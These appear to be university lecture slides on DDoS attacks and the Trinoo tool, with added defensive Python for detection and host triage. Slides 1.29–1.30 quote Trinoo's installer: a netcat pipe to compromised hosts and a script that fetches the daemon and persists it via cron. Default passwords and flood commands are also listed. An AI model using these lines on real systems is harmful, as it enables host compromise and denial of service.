1.1 Operating System Concepts
An Introduction to DDoS
And the "Trinoo" Attack Tool
Acknowledgement: Ray Lam, Ivan Wong
1.2 Outline
- Background on DDoS
  - Attack mechanism
  - Ways to defend
- The attack tool: Trinoo
  - Introduction
  - Attack scenario
  - Symptoms and defense
  - Weaknesses and next evolution
1.4 Denial-of-Service
- Flooding-based: send packets to the victim to exhaust
  - network resources
  - system resources
- Traditional DoS: one attacker
- Distributed DoS: countless attackers
1.5 Attack Mechanism
(Two diagrams in the original with attacker A, reflector R and victim V.)
- Direct attack: A sends TCP SYN, ICMP, UDP, ... packets to V with R's address as the source IP address; V answers with TCP SYN-ACK, TCP RST, ICMP, UDP, ... packets that go to R, not to A.
- Reflector attack: A sends TCP SYN, ICMP, UDP, ... packets to R with V's address as the source IP address; R answers V with TCP SYN-ACK, TCP RST, ICMP, UDP, ... packets.
1.6 Attack Architecture
- Direct attack: attacker A -> masters (handlers) -> agents (daemons or zombies) -> victim V. The agents send TCP SYN, ICMP, UDP, ... packets (the source IP addresses are usually spoofed).
- Reflector attack: attacker A -> masters (handlers) -> agents (daemons or zombies) -> reflectors -> victim V. The agents send TCP SYN, ICMP, UDP, ... packets with V's address as the source IP address, and the reflectors answer V with TCP SYN-ACK, TCP RST, ICMP, UDP, ... packets.
1.7 Attack Methods
Method | Attack packets | Reply packets
Smurf | ICMP echo queries to broadcast address | ICMP echo replies
SYN flooding | TCP SYN packets | TCP SYN-ACK packets
RST flooding | TCP packets to closed ports | TCP RST packets
ICMP flooding | ICMP queries | ICMP replies
ICMP flooding | UDP packets to closed ports | Port unreachable
ICMP flooding | IP packets with low TTL | Time exceeded
DNS reply flooding | DNS queries (recursive) to DNS servers | DNS replies
1.8 Backscatter Analysis (Moore et al.)
- Measured DoS activity on the Internet
- TCP (94+ %), UDP (2 %), ICMP (2 %)
- TCP attacks based mainly on SYN flooding
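The backscatter idea behind these figures is that a victim flooded with spoofed-source packets answers each one to a random address, so a monitor on a block of otherwise unused address space sees a uniform sample of those replies and can scale it up. The following Python is an added example, not code from the slides or from Moore et al.; the telescope size (assumed to be a /8, 1/256 of the address space) and the sample records are constructed.

```python
from collections import Counter, defaultdict

ADDRESS_SPACE = 2 ** 32      # IPv4 addresses
TELESCOPE = 2 ** 24          # monitored, otherwise unused addresses (assumed /8)

# Backscatter is the unsolicited reply a victim sends to a spoofed source;
# the kinds below are the "reply packets" column of the Attack Methods slide.
BACKSCATTER_KINDS = {
    "tcp": {"SYN-ACK", "RST"},
    "icmp": {"echo-reply", "port-unreachable", "time-exceeded"},
    "udp": {"dns-reply"},
}

# Constructed telescope samples: (second, proto, kind, src, dst).
# src is the host that sent the reply, i.e. the suspected victim.
SAMPLES = [
    (0, "tcp", "SYN-ACK", "203.0.113.10", "10.1.2.3"),
    (1, "tcp", "SYN-ACK", "203.0.113.10", "10.77.0.9"),
    (2, "tcp", "RST", "203.0.113.10", "10.5.5.5"),
    (3, "tcp", "SYN", "198.51.100.7", "10.9.9.9"),     # a probe, not a reply
    (4, "icmp", "port-unreachable", "203.0.113.20", "10.3.3.3"),
    (5, "icmp", "echo-reply", "203.0.113.20", "10.4.4.4"),
    (6, "udp", "dns-reply", "203.0.113.30", "10.8.8.8"),
]


def is_backscatter(sample):
    """True when the record is a reply kind rather than an attack probe."""
    _, proto, kind, _, _ = sample
    return kind in BACKSCATTER_KINDS.get(proto, set())


def estimate_attacks(samples, window_s):
    """Group backscatter by its sender (the victim) and scale the observed
    rate by the fraction of the address space the telescope covers."""
    per_victim = defaultdict(Counter)
    for s in samples:
        if is_backscatter(s):
            per_victim[s[3]][s[1]] += 1
    scale = ADDRESS_SPACE / TELESCOPE      # 256 for a /8 telescope
    return {
        victim: {
            "observed": sum(protos.values()),
            "estimated_pps": sum(protos.values()) / window_s * scale,
            "proto": protos.most_common(1)[0][0],
        }
        for victim, protos in per_victim.items()
    }


def protocol_mix(samples):
    """Share of backscatter by protocol, the kind of figure the slide quotes."""
    counts = Counter(s[1] for s in samples if is_backscatter(s))
    total = sum(counts.values())
    return {p: round(100 * n / total, 1) for p, n in counts.items()}


if __name__ == "__main__":
    for victim, info in estimate_attacks(SAMPLES, 60).items():
        print(victim, info)
    print(protocol_mix(SAMPLES))
```

The estimate only covers attacks whose spoofed sources are drawn uniformly from the whole address space; a flood that spoofs from a narrow range, or a reflector attack whose reply packets all go to the real victim, leaves no trace on the telescope.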
1.10 Strategy
Three lines of defense:
- Attack prevention: before the attack
- Attack detection and filtering: during the attack
- Attack source traceback: during and after the attack
1.11 Attack prevention
- Protect hosts from installation of masters and agents by attackers
- Scan hosts for symptoms of agents being installed
- Monitor network traffic for known message exchanges among attackers, masters and agents
1.12 Attack prevention
- Inadequate and hard to deploy
  - Don't-care users leave security holes
  - ISP and enterprise networks do not have incentives
1.13 Attack source traceback
- Identify the actual origin of a packet without relying on the packet's source IP
- Two approaches:
  - Routers record information about packets
  - Routers send additional information about packets to the destination
1.14 Attack source traceback
- Source traceback cannot stop an ongoing DDoS attack
- Cannot trace origins behind firewalls or NAT (network address translators)
- More work is needed for reflector attacks, since the attack packets come from legitimate sources (the reflectors)
- Useful in post-attack law enforcement
1.15 Attack detection and filtering
- Detection: identify the DDoS attack and the attack packets
- Filtering: classify normal and attack packets; drop the attack packets
1.16 Attack detection and filtering
- Can be done in 4 places: the victim's network, the victim's ISP network, further upstream ISP networks, the attack source networks
- Dispersed agents send packets to a single victim, like pouring packets in from the top of a funnel
1.17 Attack detection and filtering
(Figure: a funnel with the attack source networks at the top, then the further upstream ISP networks, the victim's ISP network, the victim's network and the victim at the bottom. Moving down toward the victim the effectiveness of detection increases; moving up toward the attack source networks the effectiveness of filtering increases.)
1.18 Attack detection and filtering
- Detection
  - Easy at the victim's network: large amount of attack packets
  - Difficult at an individual agent's network: small amount of attack packets
- Filtering
  - Effective at the agents' networks: less likely to drop normal packets
  - Ineffective at the victim's network: more normal packets are dropped
1.19 D&F at agent's network
- Usually cannot detect a DDoS attack
- Can filter attack packets with spoofed source addresses
  - Attack packets in direct attacks
  - Attack packets from agents to reflectors in reflector attacks
- Ensuring that all ISPs install ingress packet filtering is impossible
1.20 D&F at victim's network
- Detect the DDoS attack
  - Unusually high volume of incoming traffic of certain packet types
  - Degraded server and network performance
- Filtering is ineffective
  - Attack and normal packets have the same destination: the victim's IP and port
  - Attack packets have spoofed source IPs or come from many different IPs
  - Attack and normal packets are indistinguishable
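Both halves of this slide can be shown on constructed traffic: a per-second volume detector fires easily at the victim, while a per-source block list built from the same data is large, mostly useless after one packet, and sweeps up the real clients. The Python below is an added example, not code from the slides; the victim address, the client and flood addresses, and the 20 packets-per-second threshold are all assumptions.

```python
import random
from collections import Counter, defaultdict

VICTIM = "203.0.113.5"


def make_records(seed=7):
    """Constructed packet records at the victim's border, as
    (second, proto, src, dst, dport). Seconds 0-4 carry only the steady
    legitimate load; from second 5 a Trinoo-style UDP flood arrives from
    spoofed sources to random destination ports."""
    rng = random.Random(seed)
    recs = []
    for t in range(10):
        for c in range(3):                                # three real clients
            recs.append((t, "udp", f"192.0.2.{c + 1}", VICTIM, 53))
    for t in range(5, 10):
        for _ in range(60):                               # 60 flood packets/s
            src = f"198.51.100.{rng.randrange(1, 255)}"   # spoofed per packet
            recs.append((t, "udp", src, VICTIM, rng.randrange(0, 65535)))
    return recs


def detect(records, threshold_pps=20):
    """Detection at the victim: bucket packets per (destination, protocol,
    second) and flag every second whose rate exceeds the threshold, reporting
    how spread out the sources and destination ports are."""
    buckets = defaultdict(list)
    for t, proto, src, dst, dport in records:
        buckets[(dst, proto, t)].append((src, dport))
    alerts = []
    for (dst, proto, t), pkts in sorted(buckets.items()):
        if len(pkts) > threshold_pps:
            alerts.append({
                "dst": dst, "proto": proto, "second": t, "pps": len(pkts),
                "distinct_src": len({s for s, _ in pkts}),
                "distinct_dport": len({p for _, p in pkts}),
            })
    return alerts


def source_block_cost(records, dst, attack_seconds):
    """Why per-source filtering at the victim is ineffective: count the
    source addresses a block list would need for the flagged seconds, how
    many of them appeared only once, and how many legitimate clients (those
    also seen before the attack) would be swept up because they share the
    victim's IP with the flood."""
    before = {src for t, _, src, d, _ in records
              if d == dst and t not in attack_seconds}
    during = Counter(src for t, _, src, d, _ in records
                     if d == dst and t in attack_seconds)
    return {
        "rules_needed": len(during),
        "one_shot_sources": sum(1 for n in during.values() if n == 1),
        "legitimate_hit": len(before & set(during)),
    }


if __name__ == "__main__":
    recs = make_records()
    for alert in detect(recs):
        print(alert)
    print(source_block_cost(recs, VICTIM, set(range(5, 10))))
```

The detector needs nothing but a count per destination, which is why the slide calls detection easy here; `source_block_cost` is the other half of the story, since every flagged second brings a fresh set of spoofed addresses and the only stable attribute, the destination, is exactly what the legitimate clients share.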
1.21 D&F at victim's upstream ISP
- Often requested by the victim to filter the attack packets
- Alert protocol
  - Victim cannot receive the ACK from the ISP
  - Requires strong authentication and encryption
- Filtering ineffective: the ISP network may also be jammed
1.22 D&F at further upstream ISP
- Backpressure approach: the victim detects the DDoS attack and the upstream ISPs filter the attack packets
1.24 Introduction
- Discovered in August 1999
- Daemons found on Solaris 2.x systems
- Attacked a system in the University of Minnesota; the victim was unusable for 2 days
1.25 Attack type
- UDP flooding
  - Default size of UDP packet: 1000 bytes; a buffer of this size is malloc()'d and its uninitialized content is sent
  - Default period of attack: 120 seconds
  - Destination port: randomly chosen from 0 to 65534
1.27 Installation
1. Hack an account
  - Acts as repository: scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
  - Requirements: high bandwidth connection, large number of users, little administrative oversight
1.28 Installation
2. Compromise systems
  - Look for vulnerable systems: unpatched Sun Solaris and Linux
  - Remote buffer overflow exploitation
  - Set up root account
  - Open TCP ports
  - Keep a "friend list"
1.29 Installation
3. Install daemons
  - Use "netcat" ("nc") and "trin.sh"
  - netcat: network version of "cat"
  - trin.sh: shell script to set up daemons
./trin.sh | nc 128.aaa.167.217 1524 &
./trin.sh | nc 128.aaa.167.218 1524 &
1.30 Installation
trin.sh
echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
1.31 Architecture
- Direct attack: attacker -> masters (handlers) -> agents (daemons or zombies) -> victim
1.32 Communication ports
- Monitor specific ports to detect the presence of a master or agent
- Attacker -> master: TCP port 27665
- Master -> daemon: UDP port 27444
- Daemon -> master: UDP port 31335
1.33 Password protection
- Password used to prevent administrators or other hackers from taking control
- Encrypted password compiled into master and daemon using crypt()
- Clear-text password is sent over the network; the session is not encrypted
- Received password is encrypted and compared
1.34 Password protection
Default passwords:
- "l44adsl": trinoo daemon password
- "gOrave": trinoo master server startup
- "betaalmostdone": trinoo master remote interface password
- "killme": trinoo master password to control the "mdie" command
1.35 Login to master
- Telnet to port 27665 of the host with the master
- Enter password "betaalmostdone"
- Warns if others try to connect to the master
[root@r2 root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo>
1.36 Master and daemon
- Communicate by UDP packets
- Command line format: arg1 password arg2
- Default password is "l44adsl"
- When a daemon starts, it sends "HELLO" to the master; the master maintains a list of daemons
1.37 Master commands
- dos IP: DoS the IP address specified ("aaa l44adsl IP" sent to each daemon)
- mdos <ip1:ip2:ip3>: DoS the IPs simultaneously
- mtimer N: set attack period to N seconds
1.38 Master commands
- bcast: list all daemons' IPs
- mdie password: shut down all daemons
- killdead: invite all daemons to send "HELLO" to the master; delete all dead daemons from the list
1.39 Daemon commands
- Not used directly; only the master uses them to send commands to daemons
- Consist of 3 letters, so that the Unix command "strings" run on the binary (which by default lists runs of 4 or more characters) does not expose them
1.40 Daemon commands
- aaa password IP: DoS the specified IP
- bbb password N: set attack period to N seconds
- rsz password N: set attack packet size to N bytes
1.42 Symptoms
Masters
- Crontab entry: * * * * * /usr/sbin/rpc.listen
- Friend list: files "..." and "...-b"
# ls -l ... ...-b
-rw------- 1 root root 25 Sep 26 14:46 ...
-rw------- 1 root root 50 Sep 26 14:30 ...-b
1.43 Symptoms
Masters (cont'd): socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:27665 *:* LISTEN
. . .
udp 0 0 *:31335 *:*
. . .
1.44 Symptoms
Masters (cont'd): file status
# lsof | egrep ":31335|:27665"
master 1292 root 3u inet 2460 UDP *:31335
master 1292 root 4u inet 2461 TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
master 1292 root cwd DIR 3,1 1024 14356 /tmp/...
master 1292 root rtd DIR 3,1 1024 2 /
master 1292 root txt REG 3,1 30492 14357 /tmp/.../master
master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
1.45 Symptoms
Daemons: socket status
# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
. . .
udp 0 0 *:1024 *:*
udp 0 0 *:27444 *:*
. . .
1.46 Symptoms
Daemons (cont'd): file status
# lsof | egrep ":27444"
ns 1316 root 3u inet 2502 UDP *:27444
# lsof -p 1316
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ns 1316 root cwd DIR 3,1 1024 153694 /tmp/...
ns 1316 root rtd DIR 3,1 1024 2 /
ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns
ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so
ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so
ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so
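The port table on the Communication ports slide and the netstat, lsof and crontab symptoms above can be turned into a small host triage script. The Python below is an added example, not code from the slides or from Dittrich's analysis; the regular expressions assume the column layout of the slide's own `netstat -a --inet` and `lsof` output, and the sample texts are constructed from that output with one benign sshd and logrotate line added.

```python
import re

# Trinoo communication ports from the slides, mapped to the role they imply.
TRINOO_PORTS = {
    ("tcp", 27665): ("master", "attacker -> master control port"),
    ("udp", 31335): ("master", "daemon -> master HELLO port"),
    ("udp", 27444): ("daemon", "master -> daemon command port"),
}

# Column layouts as printed on the slides (old Linux netstat/lsof).
NETSTAT_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\d+)")
LSOF_RE = re.compile(
    r"^(\S+)\s+(\d+)\s+\S+\s+\S+\s+inet\s+\S+\s+(TCP|UDP)\s+\S+:(\d+)")
CRON_RE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(\S+)")   # every-minute entry


def scan_netstat(text):
    """Listening sockets on known Trinoo ports as (proto, port) tuples."""
    hits = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line.strip())
        if m:
            key = (m.group(1), int(m.group(3)))
            if key in TRINOO_PORTS:
                hits.append(key)
    return hits


def scan_lsof(text):
    """Processes bound to known Trinoo ports, with the role the port implies."""
    hits = []
    for line in text.splitlines():
        m = LSOF_RE.match(line.strip())
        if m:
            key = (m.group(3).lower(), int(m.group(4)))
            if key in TRINOO_PORTS:
                hits.append({"command": m.group(1), "pid": int(m.group(2)),
                             "proto": key[0], "port": key[1],
                             "role": TRINOO_PORTS[key][0]})
    return hits


def scan_crontab(text):
    """Commands scheduled to run every minute, the restart trick trin.sh uses."""
    return [m.group(1) for m in (CRON_RE.match(l.strip()) for l in text.splitlines()) if m]


def triage(netstat_text, lsof_text, crontab_text):
    """Combine the three views into roles found, PIDs to inspect and cron hits."""
    sockets = scan_lsof(lsof_text)
    roles = {TRINOO_PORTS[k][0] for k in scan_netstat(netstat_text)}
    roles |= {h["role"] for h in sockets}
    return {"roles": roles, "pids": {h["pid"] for h in sockets},
            "cron": scan_crontab(crontab_text)}


# Constructed samples built from the slides' output, plus benign lines.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:22                    *:*                     LISTEN
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:1024                  *:*
udp        0      0 *:31335                 *:*
udp        0      0 *:27444                 *:*
"""
LSOF_SAMPLE = """\
master   1292 root    3u  inet   2460       UDP *:31335
master   1292 root    4u  inet   2461       TCP *:27665 (LISTEN)
ns       1316 root    3u  inet   2502       UDP *:27444
sshd      412 root    3u  inet    900       TCP *:22 (LISTEN)
"""
CRON_SAMPLE = """\
* * * * * /usr/sbin/rpc.listen
0 3 * * * /usr/sbin/logrotate
"""

if __name__ == "__main__":
    print(triage(NETSTAT_SAMPLE, LSOF_SAMPLE, CRON_SAMPLE))
```

A port match alone is only a lead, since any program can bind 27665 or 27444; the lsof view adds the process name and working directory (the slides show both living under `/tmp/...`), and the every-minute crontab entry explains why killing the process does not make it go away.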
1.47 Defenses
- Prevent root-level compromise: patch systems, set up firewalls, monitor traffic
- Block abused ports (high-numbered UDP ports)
  - Trade-off: also blocks normal programs that use the same ports
1.49 Weaknesses
- Single kind of attack (UDP flooding): easily defended by single defense tools
- Uses an IP as the destination address: "moving target defense", the victim changes IP to avoid the attack
1.50 Weaknesses
- Password, encrypted password and commands are visible in the binary images
- Use the Unix command "strings" to obtain them:
  - strings master
  - strings -n3 ns
- Check whether Trinoo is found; crack the encrypted passwords
1.51 Weaknesses
- Password travels in plain text on the network
- Daemon password frequently sent in master-to-daemon commands
- Get the password with "ngrep" or "tcpdump", which show the UDP payload
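Both weaknesses on slides 1.50 and 1.51 come down to recognisable ASCII: the default passwords and three-letter commands sit uncovered in the binary, and the same strings cross the wire in clear text in the "arg1 password arg2" format. The Python below is an added example, not code from the slides, and is written from the defender's side: a minimal `strings(1)` that shows why `-n3` is needed to see the commands, an indicator scan over it, and a classifier for captured UDP payloads. The fake binary and the payloads are constructed stand-ins, not real Trinoo samples.

```python
import re

PRINTABLE = set(range(0x20, 0x7f))      # what strings(1) counts as printable

# Indicators taken from the slides: default passwords, the three-letter
# daemon commands and the HELLO the daemon sends to its master.
DEFAULT_PASSWORDS = {"l44adsl", "gOrave", "betaalmostdone", "killme"}
DAEMON_COMMANDS = {"aaa", "bbb", "rsz"}
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
COMMAND_RE = re.compile(r"^(aaa|bbb|rsz) (\S+) (\S+)$")   # arg1 password arg2


def extract_strings(blob, min_len=4):
    """Minimal strings(1): runs of printable ASCII of at least min_len bytes.
    The default of 4 is why the 3-letter commands stay hidden without -n3."""
    out, run = [], bytearray()
    for b in blob + b"\x00":            # sentinel terminates the last run
        if b in PRINTABLE:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    return out


def scan_binary(blob, min_len=4):
    """Pick Trinoo indicators out of the strings found in a binary image."""
    found = extract_strings(blob, min_len)
    return {
        "passwords": sorted(s for s in found if s in DEFAULT_PASSWORDS),
        "commands": sorted(s for s in found if s in DAEMON_COMMANDS),
        "master_ips": sorted(s for s in found if IPV4_RE.match(s)),
    }


def classify_payload(payload):
    """Classify one UDP payload captured between master and daemon."""
    try:
        text = payload.decode("ascii").strip()
    except UnicodeDecodeError:
        return None
    if text == "HELLO":
        return {"kind": "daemon-hello"}
    m = COMMAND_RE.match(text)
    if m:
        cmd, password, arg = m.groups()
        return {"kind": "master-command", "command": cmd, "arg": arg,
                "password": password,
                "default_password": password in DEFAULT_PASSWORDS}
    return None


# Constructed stand-in for a daemon binary: header-like noise around the
# strings a sample would carry (a default password, the commands, a master IP).
FAKE_DAEMON = (b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
               + b"l44adsl\x00" + b"\x90\x90" + b"aaa\x00bbb\x00rsz\x00"
               + b"HELLO\x00" + b"\x01\x02" + b"192.168.249.201\x00"
               + b"\xde\xad\xbe\xef" + b"betaalmostdone\x00")

# Constructed payloads as a sniffer on UDP 27444 / 31335 would hand them over.
PAYLOADS = [b"HELLO", b"aaa l44adsl 203.0.113.5", b"bbb l44adsl 120",
            b"GET / HTTP/1.0\r\n", b"\xff\xfe\x00"]

if __name__ == "__main__":
    print("strings (default):", scan_binary(FAKE_DAEMON))
    print("strings -n3:      ", scan_binary(FAKE_DAEMON, min_len=3))
    for p in PAYLOADS:
        print(p, "->", classify_payload(p))
```

On the wire the classifier only needs the payload text, which is exactly what the slide says ngrep and tcpdump expose; the `default_password` flag tells an analyst whether the operator changed the compiled-in password or left "l44adsl" in place.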
1.52 Uproot a Trinoo network
- Locate a daemon; use "strings" on it to obtain the IPs of the masters
- Contact the sites with a master installed; those sites check their list of daemons by inspecting the file "..." or by getting the master login password and using the "bcast" command
- Get the "mdie" password and use "mdie" to shut down all daemons; repeat "mdie" periodically, as the daemons are restarted by crontab
1.53 Next evolution
- Combination of several attack types (SYN flood, UDP flood, ICMP flood, ...): higher chance of a successful attack
- Stronger encryption of embedded strings and passwords
- Use of an encrypted communication channel
- Communication over a protocol that is difficult to detect or block, e.g. ICMP
1.54 References
- R. Chang, "Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial," Oct. 2002
- D. Dittrich, "The DoS Project's 'Trinoo' Distributed Denial of Service Attack Tool," http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999